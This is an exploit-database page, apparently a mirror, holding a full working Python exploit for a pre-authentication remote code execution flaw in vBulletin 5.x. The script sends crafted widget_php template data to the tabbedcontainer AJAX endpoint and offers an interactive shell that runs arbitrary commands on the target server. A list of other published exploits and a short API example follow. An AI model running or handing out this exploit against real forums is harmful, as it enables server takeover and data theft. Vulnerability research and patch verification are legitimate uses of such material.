To access the dashboard, Schedule scans, API and Search become a patron

Search for hundreds of thousands of exploits

"vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution"

Author

Exploit author

zenofex

Platform

Exploit platform

php

Release date

Exploit published date

2020-08-12

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
# Exploit Title: vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution
# Date: 2020-08-09
# Exploit Author: @zenofex
# Vendor Homepage: https://www.vbulletin.com/
# Software Link: None
# Version: 5.4.5 through 5.6.2
# Tested on: vBulletin 5.6.2 on Ubuntu 19.04
# CVE : None

# vBulletin 5.5.4 through 5.6.2 are vulnerable to a remote code
# execution vulnerability caused by incomplete patching of the previous
# "CVE-2019-16759" RCE. This logic bug allows for a single pre-auth
# request to execute PHP code on a target vBulletin forum.

#More info can be found at:
#https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/


#!/usr/bin/env python3
# vBulletin 5.x pre-auth widget_tabbedContainer_tab_panel RCE exploit by @zenofex

import argparse
import requests
import sys

def run_exploit(vb_loc, shell_cmd):
    post_data = {'subWidgets[0][template]' : 'widget_php', 'subWidgets[0][config][code]' : "echo shell_exec('%s'); exit;" % shell_cmd}
    r = requests.post('%s/ajax/render/widget_tabbedcontainer_tab_panel' % vb_loc, post_data)
    return r.text

ap = argparse.ArgumentParser(description='vBulletin 5.x Ajax Widget Template RCE')
ap.add_argument('-l', '--location', required=True, help='Web address to root of vB5 install.')
ARGS = ap.parse_args()

while True:
    try:
        cmd = input("vBulletin5$ ")
        print(run_exploit(ARGS.location, cmd))
    except KeyboardInterrupt:
        sys.exit("\nClosing shell...")
    except Exception as e:
        sys.exit(str(e))
Release Date Title Type Platform Author
2020-11-20 "Free MP3 CD Ripper 2.8 - Multiple File Buffer Overflow (Metasploit)" local windows ZwX
2020-11-20 "Zortam Mp3 Media Studio 27.60 - Remote Code Execution (SEH)" local windows "Vincent Wolterman"
2020-11-20 "Boxoft Convert Master 1.3.0 - 'wav' SEH Local Exploit" local windows stresser
2020-11-20 "WonderCMS 3.1.3 - 'content' Persistent Cross-Site Scripting" webapps php "Hemant Patidar"
2020-11-20 "IBM Tivoli Storage Manager Command Line Administrative Interface 5.2.0.1 - id' Field Stack Based Buffer Overflow" local windows "Paolo Stagno"
2020-11-19 "Internet Download Manager 6.38.12 - Scheduler Downloads Scheduler Buffer Overflow (PoC)" dos windows "Vincent Wolterman"
2020-11-19 "M/Monit 3.7.4 - Privilege Escalation" webapps multiple "Dolev Farhi"
2020-11-19 "Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure" remote hardware "Nitesh Surana"
2020-11-19 "PESCMS TEAM 2.3.2 - Multiple Reflected XSS" webapps multiple icekam
2020-11-19 "M/Monit 3.7.4 - Password Disclosure" webapps multiple "Dolev Farhi"
Release Date Title Type Platform Author
2020-08-12 "vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution" webapps php zenofex
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48743/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.